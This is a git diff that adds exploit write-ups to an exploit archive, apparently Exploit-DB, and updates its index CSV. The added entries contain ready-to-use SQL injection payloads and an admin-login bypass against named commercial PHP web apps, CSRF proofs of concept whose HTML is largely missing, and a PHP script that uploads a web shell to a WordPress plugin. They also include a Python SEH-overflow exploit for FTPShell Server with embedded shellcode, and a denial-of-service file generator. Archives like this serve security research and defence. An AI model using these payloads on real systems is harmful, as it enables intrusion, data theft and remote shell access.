+# Category: Webapps +# Tested on: Kali linux +# Description : PHP Dashboards is prone to an SQL-injection vulnerability +# because it fails to sufficiently sanitize user-supplied data before using +# it in an SQL query.Exploiting this issue could allow an attacker to +# compromise the application, access or modify data, or exploit latent +# vulnerabilities in the underlying database. + +# PoC : SQLi : +# Demo : https://Target/demos/sendpack/admin/ + +https://Target/demos/sendpack/admin/index.php?action=processlogin + +POST /demos/sendpack/admin/index.php?action=processlogin HTTP/1.1 +Host: www.wecodex.com +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://Target/demos/sendpack/admin/ +Cookie: PHPSESSID=6fabn4skieu59mgjn63i4d38u0 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 30 +username=admin&password=123456 + + +# Vulnerable Payload : +# Parameter: username (POST) +# Type: boolean-based blind +# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause +# Payload: + +username=admin") RLIKE (SELECT (CASE WHEN (5737=5737) THEN +0x61646d696e ELSE 0x28 END)) AND ("YAQS"="YAQS&password=123456 \ No newline at end of file diff --git a/exploits/php/webapps/44725.txt b/exploits/php/webapps/44725.txt new file mode 100644 index 000000000..46f037e3c --- /dev/null +++ b/exploits/php/webapps/44725.txt @@ -0,0 +1,48 @@ +# Exploit Title: Wecodex Store Paypal 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-05-23 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://www.wecodex.com/item/view/online-store-system-with-paypal-sdk-in-php/9 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : PHP Dashboards is prone to an SQL-injection vulnerability +# because it fails to sufficiently sanitize user-supplied data before using +# it in an SQL query.Exploiting this issue could allow an attacker to +# compromise the application, access or modify data, or exploit latent +# vulnerabilities in the underlying database. + +# PoC : SQLi : +# Demo : https://Target + +https://Target/signIn + +POST /signIn HTTP/1.1 +Host: Target +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: https://Target/login +Content-Length: 23 +Cookie: PHPSESSID=j89q1i6r4i1juosmihns9c1jo2 +Connection: keep-alive +id=admin&password=12345 + + +# Vulnerable Payload : +# Parameter: id (POST) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: + +id=admin' AND 9071=9071 AND 'gneN'='gneN&password=12345 + +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 OR time-based blind +# Payload: + +id=admin' OR SLEEP(5) AND 'gXNU'='gXNU&password=12345 \ No newline at end of file diff --git a/exploits/php/webapps/44726.txt b/exploits/php/webapps/44726.txt new file mode 100644 index 000000000..4b127e97d --- /dev/null +++ b/exploits/php/webapps/44726.txt @@ -0,0 +1,53 @@ +# Exploit Title: SAT CFDI 3.3 - SQL Injection +# Dork: N/A +# Date: 2018-05-23 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://www.wecodex.com/item/view/verification-and-validation-system-sat-cfdi-33/8 +# Version: 3.3 +# Category: Webapps +# Tested on: Kali linux +# Description : PHP Dashboards is prone to an SQL-injection vulnerability +# because it fails to sufficiently sanitize user-supplied data before using +# it in an SQL query.Exploiting this issue could allow an attacker to +# compromise the application, access or modify data, or exploit latent +# vulnerabilities in the underlying database. + +# PoC : SQLi : +# Demo : https://Target +# https://Target/signIn + +POST /signIn HTTP/1.1 +Host: Target +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: https://Target/ +Content-Length: 24 +Cookie: PHPSESSID=7knfo298eprq0la2r77ph31jr3 +Connection: keep-alive +id=admin&password=123456 + + +# Vulnerable Payload : +# Parameter: id (POST) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: + +id=admin" AND 3577=3577 AND "Stsj"="Stsj&password=123456 + +# Type: stacked queries +# Title: MySQL > 5.0.11 stacked queries (comment) +# Payload: + +id=admin";SELECT SLEEP(5)#&password=123456 + +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: + +id=admin" AND SLEEP(5) AND "bWUR"="bWUR&password=123456 \ No newline at end of file diff --git a/exploits/php/webapps/44727.txt b/exploits/php/webapps/44727.txt new file mode 100644 index 000000000..d55b8b4ad --- /dev/null +++ b/exploits/php/webapps/44727.txt @@ -0,0 +1,49 @@ +# Exploit Title: School Management System CMS 1.0 - Admin Login SQL +Injection +# Dork: N/A +# Date: 23.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor : Wecodex Solutions +# Vendor Homepage: https://www.wecodex.com/item/view/school-management-system-in-php-and-mysql/5 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : PHP Dashboards is prone to an SQL-injection vulnerability +because it fails to sufficiently sanitize user-supplied data before using +it in an SQL query.Exploiting this issue could allow an attacker to +compromise the application, access or modify data, or exploit latent +vulnerabilities in the underlying database. + +==================================================== + +# PoC : SQLi : + +https://test.com/school/maestro/index.php?view=processlogin + +POST /school/maestro/index.php?view=processlogin HTTP/1.1 +Host: test.com +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://test.com/school/maestro/ +Cookie: PHPSESSID=6fabn4skieu59mgjn63i4d38u0 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 30 +username=admin&password=123456 + + +Vulnerable Payload : + +Parameter: username (POST) +Type: boolean-based blind +Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or +GROUP BY clause +Payload: username=admin") RLIKE (SELECT (CASE WHEN (5737=5737) THEN +0x61646d696e ELSE 0x28 END)) AND ("YAQS"="YAQS&password=123456 + + + +==================================================== \ No newline at end of file diff --git a/exploits/php/webapps/44728.txt b/exploits/php/webapps/44728.txt new file mode 100644 index 000000000..c8b0b2c84 --- /dev/null +++ b/exploits/php/webapps/44728.txt @@ -0,0 +1,43 @@ +# Exploit Title: Library CMS 1.0 - SQL Injection +# Dork: N/A +# Date: 23.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor : Wecodex Solutions +# Vendor Homepage: https://www.wecodex.com/item/view/library-management-system-in-php-and-mysql/1 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : PHP Dashboards is prone to an SQL-injection vulnerability +# because it fails to sufficiently sanitize user-supplied data before using +# it in an SQL query.Exploiting this issue could allow an attacker to +# compromise the application, access or modify data, or exploit latent +# vulnerabilities in the underlying database. + +# PoC : SQLi : +# Demo : https://Target/demos/library/admin/ + +https://Target/demos/library/admin/index.php?action=processlogin + +POST /demos/library/admin/index.php?action=processlogin HTTP/1.1 +Host: Target +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://Target/demos/library/admin/ +Cookie: PHPSESSID=6fabn4skieu59mgjn63i4d38u0 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 30 +username=admin&password=123456 + + +# Vulnerable Payload : +# Parameter: username (POST) +# Type: boolean-based blind +# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause +# Payload: + +username=admin") RLIKE (SELECT (CASE WHEN (5737=5737) THEN +0x61646d696e ELSE 0x28 END)) AND ("YAQS"="YAQS&password=123456 \ No newline at end of file diff --git a/exploits/php/webapps/44729.txt b/exploits/php/webapps/44729.txt new file mode 100644 index 000000000..226a57c88 --- /dev/null +++ b/exploits/php/webapps/44729.txt @@ -0,0 +1,51 @@ +# Exploit Title: Wecodex Hotel CMS 1.0 - 'Admin Login' SQL Injection +# Dork: N/A +# Date: 2018-05-23 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor : Wecodex Solutions +# Vendor Homepage: https://www.wecodex.com/item/view/hotel-management-system-in-php-and-mysql/7 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : PHP Dashboards is prone to an SQL-injection vulnerability +# because it fails to sufficiently sanitize user-supplied data before using +# it in an SQL query.Exploiting this issue could allow an attacker to +# compromise the application, access or modify data, or exploit latent +# vulnerabilities in the underlying database. + +# PoC : SQLi : +# Demo : https://Target/demos/hotel/admin/ + +https://Target/demos/hotel/admin/index.php?action=processlogin + +POST /demos/hotel/admin/index.php?action=processlogin HTTP/1.1 +Host: Target +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://Target/demos/hotel/admin/ +Cookie: PHPSESSID=6fabn4skieu59mgjn63i4d38u0 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 30 +username=admin&password=123456 + + +# Vulnerable Payload : +# Parameter: email (POST) +# Type: boolean-based blind +# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause +# Payload: + +username=admin" RLIKE (SELECT (CASE WHEN (7084=7084) THEN +0x61646d696e4061646d696e2e636f6d ELSE 0x28 END)) AND +"eloY"="eloY&password=123456 + +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +# Payload: + +username=admin" AND (SELECT * FROM (SELECT(SLEEP(5)))lzxm) AND +"vZea"="vZea&password=123456 \ No newline at end of file diff --git a/exploits/php/webapps/44730.txt b/exploits/php/webapps/44730.txt new file mode 100644 index 000000000..4ede62276 --- /dev/null +++ b/exploits/php/webapps/44730.txt @@ -0,0 +1,51 @@ +# Exploit Title: Wecodex Restaurant CMS 1.0 - 'Login' SQL Injection +# Dork: N/A +# Date: 2018-05-23 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor : Wecodex Solutions +# Vendor Homepage: https://www.wecodex.com/item/view/restaurant-system-in-php-and-mysql/6 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : PHP Dashboards is prone to an SQL-injection vulnerability +# because it fails to sufficiently sanitize user-supplied data before using +# it in an SQL query.Exploiting this issue could allow an attacker to +# compromise the application, access or modify data, or exploit latent +# vulnerabilities in the underlying database. + +# PoC : SQLi : +# Demo : https://Target/demos/restaurant/admin/ + +https://Target/demos/restaurant/admin/index.php?action=processlogin + +POST /demos/restaurant/admin/index.php?action=processlogin HTTP/1.1 +Host: Target +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://Target/demos/restaurant/admin/ +Cookie: PHPSESSID=6fabn4skieu59mgjn63i4d38u0 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 30 +username=admin&password=123456 + + +# Vulnerable Payload : +# Parameter: email (POST) +# Type: boolean-based blind +# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause +# Payload: + +username=admin" RLIKE (SELECT (CASE WHEN (7084=7084) THEN +0x61646d696e4061646d696e2e636f6d ELSE 0x28 END)) AND +"eloY"="eloY&password=123456 + +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +# Payload: + +username=admin" AND (SELECT * FROM (SELECT(SLEEP(5)))lzxm) AND +"vZea"="vZea&password=123456 \ No newline at end of file diff --git a/exploits/php/webapps/44732.txt b/exploits/php/webapps/44732.txt new file mode 100644 index 000000000..02bb7ea87 --- /dev/null +++ b/exploits/php/webapps/44732.txt @@ -0,0 +1,29 @@ +# Exploit Title: eWallet - Online Payment Gateway 2 - Cross-Site Request Forgery +# Date: 2018-05-23 +# Exploit Author: L0RD +# Vendor Homepage: https://codecanyon.net/item/ewallet-online-payment-gateway/19316332?s_rank=1110 +# Version: 2 +# Tested on: Kali linux + +# POC : +# eWallet - Online Payment Gateway 2 suffers from csrf vulnerability . +# Attacker can send target account balance to his account . + +# Exploit : + + + + CSRF POC + + +
+ + + + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/44733.txt b/exploits/php/webapps/44733.txt new file mode 100644 index 000000000..290e39dc9 --- /dev/null +++ b/exploits/php/webapps/44733.txt @@ -0,0 +1,12 @@ +# Exploit Title: # Exploit Title: Mcard Mobile Card Selling Platform 1 - SQL Injection +# Date: 2018-05-23 +# Exploit Author: L0RD +# Vendor Homepage: https://codecanyon.net/item/mcard-mobile-card-selling-platform/19307193?s_rank=15 +# Version: 1 +# Tested on: Kali linux + +# POC 1 : + +# Attacker can bypass admin panel authentication +Username : ' OR 0=0 # +Password : anything \ No newline at end of file diff --git a/exploits/php/webapps/44735.txt b/exploits/php/webapps/44735.txt new file mode 100644 index 000000000..3ebb2e152 --- /dev/null +++ b/exploits/php/webapps/44735.txt @@ -0,0 +1,121 @@ +# Title: NewsBee CMS 1.4 - Cross-Site Request Forgery +# Author: indoushka +# Tested on: windows 10 Français V.(Pro) +# Vendor: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937 +# Dork: N/A + +# PoC + + +
+
+
+ + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
 Tab PermissionComment ModerateNewEditDelete
News
Videosx
Galleryx
Adsx
Home Sliderx
FAQx
Categoriesx
Pagesx
+ + + + + + + +
+ +
+
+
+
+ \ No newline at end of file diff --git a/exploits/php/webapps/44737.txt b/exploits/php/webapps/44737.txt new file mode 100644 index 000000000..1c123cfa2 --- /dev/null +++ b/exploits/php/webapps/44737.txt @@ -0,0 +1,44 @@ +# Exploit Title: Wordpress Plugin Peugeot Music - Arbitrary File Upload +# Google Dork: inurl:/wp-content/plugins/peugeot-music-plugin/ +# Date: 2018-05-23 +# Exploit Author: Mr.7z +# Vendor Homepage: - +# Software Link: - +# Version: 1.0 +# Tested on: Windows 10 64bit (Home Edition) + +# Exploit: /wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php +# Vuln? {"jsonrpc" : "2.0", "result" : null, "id" : "id"} + +# CSRF + "@yourshell.jpg", +"name" => "yourshell.php" +); +$ch = curl_init ("$url"); +curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); +curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); +curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; +rv:32.0) Gecko/20100101 Firefox/32.0"); +curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5); +curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); +curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); +curl_setopt ($ch, CURLOPT_POST, 1); +@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post); +$data = curl_exec ($ch); +curl_close ($ch); +echo $data; + +?> + +# For CSRF using php xampp. +# Shell Locate: +target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php + +# Thanks To XaiSyndicate - Family Attack Cyber - HunterSec-Team - +# Typical Idiot Security [!] \ No newline at end of file diff --git a/exploits/windows/local/44713.py b/exploits/windows/local/44713.py new file mode 100755 index 000000000..65e4f9e2c --- /dev/null +++ b/exploits/windows/local/44713.py @@ -0,0 +1,74 @@ +#!/usr/bin/python +#----------------------------------------------------------------------------------------------------------# +# Exploit Title : FTPShell Server v6.80 - Local Buffer Overflow (SafeSEH Bypass) # +# Exploit Author : Hashim Jawad - @ihack4falafel # +# Vendor Homepage : http://www.ftpshell.com/ # +# Vulnerable Software: http://www.ftpshell.com/downloadserver.htm # +# Tested on : Windows XP Professional SP3 # +# Steps to reproduce : paste contents of Evil.txt in 'Password' field under configure accounts>Change pass # +#----------------------------------------------------------------------------------------------------------# + +''' +Notes: +===== +* All loaded modules including base binary are compiled with /SAFESEH +* Null byte '\x00' get mangled by the program and end up as space '\x20' +''' + +#root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -b "\x00\x0a\x0d" -f python -v shellcode +#Payload size: 447 bytes +shellcode = "" +shellcode += "\x89\xe0\xd9\xed\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a" +shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43" +shellcode += "\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41" +shellcode += "\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" +shellcode += "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x79" +shellcode += "\x6c\x7a\x48\x4c\x42\x67\x70\x73\x30\x57\x70\x43" +shellcode += "\x50\x4d\x59\x4b\x55\x36\x51\x59\x50\x61\x74\x4e" +shellcode += "\x6b\x56\x30\x46\x50\x6e\x6b\x61\x42\x56\x6c\x6c" +shellcode += "\x4b\x72\x72\x32\x34\x6e\x6b\x61\x62\x37\x58\x76" +shellcode += "\x6f\x38\x37\x72\x6a\x54\x66\x55\x61\x4b\x4f\x4e" +shellcode += "\x4c\x45\x6c\x30\x61\x71\x6c\x35\x52\x46\x4c\x45" +shellcode += "\x70\x6b\x71\x58\x4f\x44\x4d\x77\x71\x69\x57\x7a" +shellcode += "\x42\x6c\x32\x63\x62\x46\x37\x4e\x6b\x62\x72\x62" +shellcode += "\x30\x6e\x6b\x53\x7a\x47\x4c\x4c\x4b\x52\x6c\x74" +shellcode += "\x51\x52\x58\x6b\x53\x62\x68\x77\x71\x5a\x71\x62" +shellcode += "\x71\x4e\x6b\x76\x39\x57\x50\x36\x61\x4a\x73\x6e" +shellcode += "\x6b\x47\x39\x56\x78\x59\x73\x65\x6a\x52\x69\x6e" +shellcode += "\x6b\x57\x44\x6c\x4b\x67\x71\x4e\x36\x34\x71\x6b" +shellcode += "\x4f\x6e\x4c\x5a\x61\x58\x4f\x74\x4d\x76\x61\x4b" +shellcode += "\x77\x70\x38\x69\x70\x52\x55\x38\x76\x75\x53\x51" +shellcode += "\x6d\x59\x68\x65\x6b\x73\x4d\x65\x74\x43\x45\x78" +shellcode += "\x64\x61\x48\x6c\x4b\x36\x38\x67\x54\x76\x61\x49" +shellcode += "\x43\x73\x56\x4c\x4b\x76\x6c\x50\x4b\x6e\x6b\x31" +shellcode += "\x48\x77\x6c\x43\x31\x79\x43\x6e\x6b\x43\x34\x4c" +shellcode += "\x4b\x53\x31\x7a\x70\x4d\x59\x37\x34\x66\x44\x67" +shellcode += "\x54\x33\x6b\x53\x6b\x50\x61\x30\x59\x31\x4a\x63" +shellcode += "\x61\x69\x6f\x59\x70\x71\x4f\x51\x4f\x33\x6a\x6e" +shellcode += "\x6b\x76\x72\x6a\x4b\x6e\x6d\x33\x6d\x43\x5a\x63" +shellcode += "\x31\x6c\x4d\x6c\x45\x4c\x72\x47\x70\x45\x50\x33" +shellcode += "\x30\x56\x30\x53\x58\x74\x71\x4e\x6b\x62\x4f\x4f" +shellcode += "\x77\x59\x6f\x6b\x65\x6f\x4b\x4c\x30\x4f\x45\x6d" +shellcode += "\x72\x43\x66\x62\x48\x39\x36\x6a\x35\x6f\x4d\x4d" +shellcode += "\x4d\x59\x6f\x5a\x75\x47\x4c\x53\x36\x63\x4c\x55" +shellcode += "\x5a\x4f\x70\x49\x6b\x6d\x30\x31\x65\x53\x35\x6d" +shellcode += "\x6b\x62\x67\x37\x63\x30\x72\x62\x4f\x32\x4a\x55" +shellcode += "\x50\x70\x53\x79\x6f\x6e\x35\x31\x73\x71\x71\x30" +shellcode += "\x6c\x71\x73\x46\x4e\x43\x55\x51\x68\x35\x35\x35" +shellcode += "\x50\x41\x41" + +buffer = '\xcc' * 2101 # filler to nSEH offset +buffer += '\xeb\x06\x90\x90' # nSEH | hop over SEH +buffer += '\x18\x05\xfc\x7f' # SEH | 0x7ffc0518 : pop edi # pop edi # ret [SafeSEH Bypass] +buffer += '\x90' * 10 # nops sled +buffer += shellcode # calc.exe +buffer += '\xcc' * (5000-2101-4-4-10-len(shellcode)) + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except Exception as e: + print e \ No newline at end of file diff --git a/exploits/windows_x86/dos/44717.txt b/exploits/windows_x86/dos/44717.txt new file mode 100644 index 000000000..cde7b7c2c --- /dev/null +++ b/exploits/windows_x86/dos/44717.txt @@ -0,0 +1,20 @@ +# Exploit Title: FTPShell Server 6.80 - Local Denial of Service +# Exploit Author: Hashim Jawad +# Date: 2018-05-23 +# Vendor Homepage: http://www.ftpshell.com/ +# Vulnerable Software: http://www.ftpshell.com/downloadserver.htm +# Tested on: Windows 7 Enterprise - SP1 (x86) +# Steps to reproduce: under FTP user accounts paste contents of Evil.txt in domain controller field + +#!/usr/bin/python + +buffer = '\x41' * 2500 + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except Exception as e: + print e \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 70e094804..a036a2a4d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5485,7 +5485,7 @@ id,file,description,date,author,type,platform,port 43930,exploits/windows/dos/43930.py,"LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow",2018-01-30,"Miguel Mendez Z",dos,windows, 43937,exploits/multiple/dos/43937.html,"WebKit - 'detachWrapper' Use-After-Free",2018-02-01,"Google Security Research",dos,multiple, 43938,exploits/multiple/dos/43938.html,"WebKit - 'WebCore::FrameView::clientToLayoutViewportPoint' Use-After-Free",2018-02-01,"Google Security Research",dos,multiple, -43968,exploits/php/dos/43968.py,"WordPress Core - 'load-scripts.php' Denial of Service",2018-02-05,"Barak Tawily",dos,php, +43968,exploits/php/dos/43968.py,"WordPress Core - 'load-scripts.php' Denial of Service",2018-02-05,"Barak Tawily",dos,php, 42341,exploits/windows/dos/42341.c,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)",2017-10-27,"Ivan Ivanovic",dos,windows, 43972,exploits/multiple/dos/43972.txt,"Claymore Dual GPU Miner 10.5 - Format String",2018-02-05,res1n,dos,multiple,3333 43986,exploits/hardware/dos/43986.py,"Cisco ASA - Crash (PoC)",2018-02-07,"Sean Dillon",dos,hardware, @@ -5902,7 +5902,7 @@ id,file,description,date,author,type,platform,port 44260,exploits/multiple/dos/44260.js,"Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read",2018-03-06,"Google Security Research",dos,multiple, 44264,exploits/linux/dos/44264.c,"Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (1)",2018-03-05,anonymous,dos,linux,11211 44265,exploits/linux/dos/44265.py,"Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API",2018-03-08,649,dos,linux,11211 -44268,exploits/android/dos/44268.txt,"Broadcom BCM43xx Wi-Fi - 'BroadPWN' Denial of Service",2016-12-01,649,dos,android, +44268,exploits/android/dos/44268.txt,"Broadcom BCM43xx Wi-Fi - 'BroadPWN' Denial of Service",2016-12-01,649,dos,android, 44271,exploits/windows/dos/44271.py,"WebLog Expert Enterprise 9.4 - Denial of Service",2018-03-09,hyp3rlinx,dos,windows, 44291,exploits/android/dos/44291.cpp,"Android DRM Services - Buffer Overflow",2018-03-15,"Tamir Zahavi-Brunner",dos,android, 44301,exploits/linux/dos/44301.c,"Linux Kernel < 4.5.1 - Off-By-One (PoC)",2016-10-16,"Vitaly Nikolenko",dos,linux, @@ -5914,8 +5914,8 @@ id,file,description,date,author,type,platform,port 44311,exploits/windows_x86-64/dos/44311.cpp,"Microsoft Windows Kernel - 'nt!NtWaitForDebugEvent' 64-bit Stack Memory Disclosure",2018-03-20,"Google Security Research",dos,windows_x86-64, 44312,exploits/windows/dos/44312.js,"Internet Explorer - 'RegExp.lastMatch' Memory Disclosure",2018-03-20,"Google Security Research",dos,windows, 44316,exploits/linux/dos/44316.py,"Kamailio 5.1.1 / 5.1.0 / 5.0.0 - Off-by-One Heap Overflow",2018-03-20,EnableSecurity,dos,linux,5060 -44326,exploits/android/dos/44326.py,"Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure",2018-03-23,QuarksLab,dos,android, -44327,exploits/android/dos/44327.py,"Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read",2018-03-23,QuarksLab,dos,android, +44326,exploits/android/dos/44326.py,"Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure",2018-03-23,QuarksLab,dos,android, +44327,exploits/android/dos/44327.py,"Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read",2018-03-23,QuarksLab,dos,android, 44332,exploits/linux/dos/44332.py,"Dell EMC NetWorker - Denial of Service",2018-03-23,"Marek Cybul",dos,linux, 44333,exploits/windows/dos/44333.py,"WM Recorder 16.8.1 - Denial of Service",2018-03-23,bzyo,dos,windows, 44338,exploits/windows/dos/44338.py,"Easy Avi Divx Xvid to DVD Burner 2.9.11 - '.avi' Denial of Service",2018-03-23,"Hashim Jawad",dos,windows, @@ -5964,7 +5964,7 @@ id,file,description,date,author,type,platform,port 44562,exploits/multiple/dos/44562.c,"Apple macOS/iOS - ReportCrash mach port Replacement due to Failure to Respect MIG Ownership Rules",2018-04-30,"Google Security Research",dos,multiple, 44566,exploits/multiple/dos/44566.html,"WebKit - 'WebCore::jsElementScrollHeightGetter' Use-After-Free",2018-05-02,"Google Security Research",dos,multiple, 44572,exploits/windows/dos/44572.txt,"Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service",2018-05-02,"Tenable NS",dos,windows, -44579,exploits/linux/dos/44579.c,"Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free",2018-04-30,SecuriTeam,dos,linux, +44579,exploits/linux/dos/44579.c,"Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free",2018-04-30,SecuriTeam,dos,linux, 44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows, 44600,exploits/windows_x86/dos/44600.c,"2345 Security Guard 3.7 - '2345NetFirewall.sys' Denial of Service",2018-05-08,anhkgg,dos,windows_x86, 44605,exploits/windows/dos/44605.py,"Allok Video Splitter 3.1.12.17 - Denial of Service",2018-05-09,Achilles,dos,windows, @@ -5977,6 +5977,9 @@ id,file,description,date,author,type,platform,port 44693,exploits/linux/dos/44693.py,"Siemens SIMATIC S7-1500 CPU - Remote Denial of Service",2018-05-22,t4rkd3vilz,dos,linux, 44694,exploits/windows/dos/44694.js,"Microsoft Edge Chakra JIT - Magic Value Type Confusion",2018-05-22,"Google Security Research",dos,windows, 44695,exploits/hardware/dos/44695.c,"AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass",2018-05-22,"Google Security Research",dos,hardware, +44717,exploits/windows_x86/dos/44717.txt,"FTPShell Server 6.80 - Denial of Service",2018-05-23,"Hashim Jawad",dos,windows_x86, +44721,exploits/linux/dos/44721.py,"Siemens SCALANCE S613 - Remote Denial of Service",2018-05-23,t4rkd3vilz,dos,linux, +44724,exploits/android/dos/44724.txt,"Samsung Galaxy S7 Edge - Overflow in OMACP WbXml String Extension Processing",2018-05-23,"Google Security Research",dos,android, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -6817,7 +6820,7 @@ id,file,description,date,author,type,platform,port 9476,exploits/windows/local/9476.py,"VUPlayer 2.49 - '.m3u' Universal Buffer Overflow",2009-08-18,mr_me,local,windows, 9477,exploits/android/local/9477.txt,"Linux Kernel 2.x (Android) - 'sock_sendpage()' Local Privilege Escalation",2009-08-18,Zinx,local,android, 9479,exploits/linux/local/9479.c,"Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)",2009-08-24,"INetCop Security",local,linux, -9483,exploits/windows/local/9483.pl,"Photodex ProShow Gold 4 (Windows XP SP3) - '.psh' Universal Buffer Overflow (SEH)",2009-08-24,corelanc0d3r,local,windows, 